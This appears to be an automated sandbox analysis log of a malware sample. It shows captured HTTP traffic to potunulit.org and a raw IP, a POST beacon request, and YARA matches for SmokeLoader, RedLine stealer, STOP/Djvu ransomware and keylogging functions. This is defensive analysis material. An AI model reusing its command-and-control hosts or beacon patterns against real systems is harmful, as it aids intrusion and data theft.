6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uc9nXYF1fmW%2Bagssg3q%2BTFkHnGyG6xXPS%2Bu1VDdcQ7JP4CYuoLuwjAjY%2BoX0XADjyHIyL4EBCfE06sNSpp3Rd7QKWR9Oh5YPP0ukKVvyqIB4UrTBLysCpLCWDyuk5gXX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa29c3c5a9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6PedILqYb%2BwMtD2wBJm4ZxSuts3E7I0IwDbY5uPogmztKqFme4lJUWm3V74LUK2NlCZg5kCtcGIso%2B9MH%2FLhwKrANT9xqhHSvRoMjv5D1b3CuqLAkDNGMDntXlxckE78"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa29e1f8d9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jXA5e%2BFvXglUebSfydu1jGbAZaIN%2BEwesa3yQEBLrRnFGEadxsba8zsO1UquRqdjFm%2FQj3ypTAY%2FFfs9%2BEd83%2FHbDO%2Fnv0rXAEZ45COzU0JhoH7B5cl2z2GopIkweeQ%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa29faa3f9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9mT70NdXjnFVYbDGiWKoYAvHVqm3cQYT48fLG6X8Ock5ML5BUUeBtUhxIcO4HdX%2BdqDpJuQgc9VRZqSxm7hLShTLeGbUo1oEgiEOx5R4pwhSR4k3uAQ%2BnwuuV86kkV3r"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2a0dc119b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ryjphgb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: potunulit.org
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49737 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Keylogger Generic
Source: Yara match File source: 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fontview.exe PID: 4772, type: MEMORYSTR
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 6_2_00402830
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 6_2_00402830
Creates a DirectInput object (often for capturing keystrokes)
Source: file.exe, 00000000.00000002.397065443.0000000000798000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Installs a raw input device (often for capturing keystrokes)
Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: GetRawInputData

Spam, unwanted Advertisements and Ransom Demands
barindex
Yara detected Djvu Ransomware
Source: Yara match File source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.478433039.00000000048E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.397013971.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.573778926.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DCE1 0_2_0040DCE1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C2AD 0_2_0040C2AD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BD69 0_2_0040BD69
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C7F1 0_2_0040C7F1
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004041D0 6_2_004041D0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00411470 6_2_00411470
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004010E0 6_2_004010E0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00406150 6_2_00406150
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004021D0 6_2_004021D0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0042429D 6_2_0042429D
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0042C5FE 6_2_0042C5FE
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0040D600 6_2_0040D600
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004266B9 6_2_004266B9
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00402830 6_2_00402830
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0040C9A0 6_2_0040C9A0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00419A6E 6_2_00419A6E
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0041CAF0 6_2_0041CAF0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00409B10 6_2_00409B10
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0042AB9A 6_2_0042AB9A
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0040CC40 6_2_0040CC40
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00401D90 6_2_00401D90
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0040CE90 6_2_0040CE90
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00421F48 6_2_00421F48
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040DCE1 7_2_0040DCE1
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040BD69 7_2_0040BD69
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040CEE9 7_2_0040CEE9
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040C2AD 7_2_0040C2AD
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_00404BDB 7_2_00404BDB
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040C7F1 7_2_0040C7F1
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_00406793 7_2_00406793
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.globalization.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\43D0.exe F55976607594D241004245F084ADD64F399F7D4683C603F56EF92C0CBCD41E05
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
